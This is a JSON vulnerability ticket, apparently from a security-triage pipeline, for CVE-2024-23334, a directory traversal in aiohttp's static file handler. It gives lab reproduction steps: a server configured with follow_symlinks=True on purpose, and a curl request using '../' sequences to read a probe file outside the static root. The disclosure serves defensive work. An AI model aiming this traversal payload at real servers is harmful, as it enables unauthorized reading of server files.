{
  "claim": {
    "argus_claim_ref": null,
    "attacker_control": null,
    "claimed_surface": "converter_document",
    "expected_impact": "code_execution",
    "finding_id": null,
    "id": null,
    "required_entrypoint_detail": null,
    "required_entrypoint_kind": "convert_document",
    "submission_reason": "ticket_derived",
    "trigger_class": "document_input",
    "upstream_verdicts": null
  },
  "latest_description": "## Summary\nImproper validation of static file paths in aiohttp’s `web.static()` handler allows directory traversal when `follow_symlinks=True`, enabling attackers to read arbitrary files outside the static root. The issue is fixed in aiohttp 3.9.2.\n\n## Affected Package\n- **Name:** aiohttp\n- **Ecosystem:** pip (Python)\n- **Vulnerable versions:** >= 1.0.5, < 3.9.2\n- **Patched version:** 3.9.2\n\n## Details\nWhen aiohttp is used as a web server and a static route is configured with `follow_symlinks=True`, the implementation does not validate that the resolved path stays within the static root directory. As a result, path traversal sequences (e.g., `../`) can escape the static root and read arbitrary files on the server filesystem. The issue occurs even when no symlinks are present. This is a CWE-22 (path traversal) vulnerability.\n\nMitigations recommended by maintainers include disabling `follow_symlinks`, and using a reverse proxy (e.g., nginx) to serve static assets instead of aiohttp in production.\n\n## Reproduction Steps\n> **Note:** Use only in a lab environment. The steps below read a non-sensitive test file.\n\n### Environment setup\n1. Install a vulnerable version:\n   ```bash\n   python3 -m venv venv\n   source venv/bin/activate\n   pip install aiohttp==3.9.1\n   ```\n2. Create a minimal aiohttp server with a static route:\n   ```python\n   # save as server.py\n   from aiohttp import web\n   import os\n\n   app = web.Application()\n   os.makedirs(\"static\", exist_ok=True)\n   with open(\"static/index.html\", \"w\") as f:\n       f.write(\"ok\")\n\n   # Vulnerable configuration: follow_symlinks=True\n   app.router.add_routes([\n       web.static(\"/static\", \"static/\", follow_symlinks=True),\n   ])\n\n   web.run_app(app, host=\"127.0.0.1\", port=8080)\n   ```\n3. Create a probe file **outside** the static root:\n   ```bash\n   echo 'POC-AIOHTTP-VULN-TEST' > /tmp/poc-aiohttp-test.txt\n   ```\n4. Start the server:\n   ```bash\n   python3 server.py\n   ```\n\n### Trigger\n5. Request the probe file using path traversal:\n   ```bash\n   curl -v \"http://127.0.0.1:8080/static/../../../../tmp/poc-aiohttp-test.txt\"\n   ```\n\n### Expected vs vulnerable behavior\n- **Expected (secure):** Server should reject traversal and return 404/403.\n- **Vulnerable:** Server responds with the contents of `/tmp/poc-aiohttp-test.txt`.\n\n## Indicators of Success\n- The HTTP response body contains `POC-AIOHTTP-VULN-TEST`, proving a file outside the static root was read.\n\n## References\n- https://nvd.nist.gov/vuln/detail/CVE-2024-23334\n- https://github.com/advisories/GHSA-5h86-8mv2-jq9f\n- https://github.com/aio-libs/aiohttp/commit/1c335944d6a8b1298baf179b7c0b3069f10c514b\n- https://github.com/aio-libs/aiohttp/pull/8079\n- https://www.exploit-db.com/exploits/52474\n- https://github.com/TheRedP4nther/LFI-aiohttp-CVE-2024-23334-PoC\n- https://github.com/brian-edgar-re/poc-cve-2024-23334",
  "product": "pip:aiohttp",
  "severity": "high",
  "status": "open",
  "summary": "aiohttp static file serving with follow_symlinks=True allows directory traversal and arbitrary file read outside the configured static root.",
  "ticket_id": "CVE-2024-23334"
}